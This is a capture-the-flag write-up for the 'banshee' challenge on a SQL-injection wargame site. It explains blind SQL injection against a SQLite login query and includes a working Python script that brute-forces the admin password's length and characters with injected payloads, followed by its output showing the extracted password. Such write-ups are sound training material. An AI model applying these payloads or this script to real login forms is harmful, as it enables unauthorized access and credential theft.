Skip to main content

banshee

1

We are provided with the SQLite query.

SELECT id FROM member WHERE id='admin' AND pw='{$_GET[pw]}'

In order to solve this challenge, we have to perform blind SQL injection.

 

Blind SQL injection

Extracting the password length

If we provide the following URI parameter:

?pw=' OR id='admin' AND length(pw)=[length] -- -

The resultant query becomes:

SELECT id FROM member WHERE id='admin' AND pw='' OR id='admin' AND length(pw)=[length] -- -'

When the length of pw for id='admin' is equal to the [length] that we provide, the query will result into True. This will cause the login success! message to be printed. We can brute force the length and use the message as an indicator of correct brute force value.

Leaking the password

If we provide the following URI parameter:

?pw=' OR id='admin' AND substr(pw, [index], 1)='[char]' -- -

The resultant query becomes:

SELECT id FROM member WHERE id='admin' AND pw='' OR id='admin' AND substr(pw, [index], 1)='[char]' -- -'

If for id='admin', the character of the pw at [index] is the same as the [character] that we provide, the query will result into True. This will cause the login success! message to be printed. We can brute force the password by changing the [index] and the [character].

Script

banshee_script.py
import requests
import urllib.parse
import string

cookies = {'PHPSESSID': 'p4hrm6i519s3gb9g95dqsmqk8v'}
url = "https://los.rubiya.kr/chall/banshee_ece938c70ea2419a093bb0be9f01a7b1.php"
password_length = 0

for x in range(0, 10):
  payload = f"' OR id='admin' AND length(pw)={x} -- -"
  encoded_payload = urllib.parse.quote_plus(payload)
  full_url = f"{url}?pw={encoded_payload}"
    
  response = requests.get(full_url, cookies=cookies)
    
  if "login success!" in response.text:
    password_length = x
    break

print()    
print(f"[!] Payload: ?pw={payload}")
print(f"[!] Payload (URL encoded): ?pw={encoded_payload}")
print(f"[!] Password length: {password_length}")

password = ""
searchspace = string.digits + string.ascii_letters

for index in range(1, password_length + 1):
  for char in searchspace:
    payload = f"' OR id='admin' AND substr(pw, {index}, 1)='{char}' -- -"
    encoded_payload = urllib.parse.quote_plus(payload)
    full_url = f"{url}?pw={encoded_payload}"

    response = requests.get(full_url, cookies=cookies)

    if "login success!" in response.text:
      password += char
      print()
      print(f"[+] Payload: ?pw={payload}")
      print(f"[+] Payload (URL encoded): ?pw={encoded_payload}")
      print(f"[+] Character at index {index}: {char}")
      break

print()
print(f"[!] Extracted password: {password}")
print(f"[!] Final payload: ?pw={password}")
$ python .\banshee_script.py     

[!] Payload: ?pw=' OR id='admin' AND length(pw)=8 -- -
[!] Payload (URL encoded): ?pw=%27+OR+id%3D%27admin%27+AND+length%28pw%29%3D8+--+-
[!] Password length: 8

[+] Payload: ?pw=' OR id='admin' AND substr(pw, 1, 1)='0' -- -
[+] Payload (URL encoded): ?pw=%27+OR+id%3D%27admin%27+AND+substr%28pw%2C+1%2C+1%29%3D%270%27+--+-
[+] Character at index 1: 0

[+] Payload: ?pw=' OR id='admin' AND substr(pw, 2, 1)='3' -- -
[+] Payload (URL encoded): ?pw=%27+OR+id%3D%27admin%27+AND+substr%28pw%2C+2%2C+1%29%3D%273%27+--+-
[+] Character at index 2: 3

[+] Payload: ?pw=' OR id='admin' AND substr(pw, 3, 1)='1' -- -
[+] Payload (URL encoded): ?pw=%27+OR+id%3D%27admin%27+AND+substr%28pw%2C+3%2C+1%29%3D%271%27+--+-
[+] Character at index 3: 1

[+] Payload: ?pw=' OR id='admin' AND substr(pw, 4, 1)='3' -- -
[+] Payload (URL encoded): ?pw=%27+OR+id%3D%27admin%27+AND+substr%28pw%2C+4%2C+1%29%3D%273%27+--+-
[+] Character at index 4: 3

[+] Payload: ?pw=' OR id='admin' AND substr(pw, 5, 1)='0' -- -
[+] Payload (URL encoded): ?pw=%27+OR+id%3D%27admin%27+AND+substr%28pw%2C+5%2C+1%29%3D%270%27+--+-
[+] Character at index 5: 0

[+] Payload: ?pw=' OR id='admin' AND substr(pw, 6, 1)='9' -- -
[+] Payload (URL encoded): ?pw=%27+OR+id%3D%27admin%27+AND+substr%28pw%2C+6%2C+1%29%3D%279%27+--+-
[+] Character at index 6: 9

[+] Payload: ?pw=' OR id='admin' AND substr(pw, 7, 1)='1' -- -
[+] Payload (URL encoded): ?pw=%27+OR+id%3D%27admin%27+AND+substr%28pw%2C+7%2C+1%29%3D%271%27+--+-
[+] Character at index 7: 1

[+] Payload: ?pw=' OR id='admin' AND substr(pw, 8, 1)='b' -- -
[+] Payload (URL encoded): ?pw=%27+OR+id%3D%27admin%27+AND+substr%28pw%2C+8%2C+1%29%3D%27b%27+--+-
[+] Character at index 8: b

[!] Extracted password: 0313091b
[!] Final payload: ?pw=0313091b

 

If we provide the following URI parameter:

?pw=0313091b

The resultant query becomes:

SELECT id FROM member WHERE id='admin' AND pw='0313091b'

2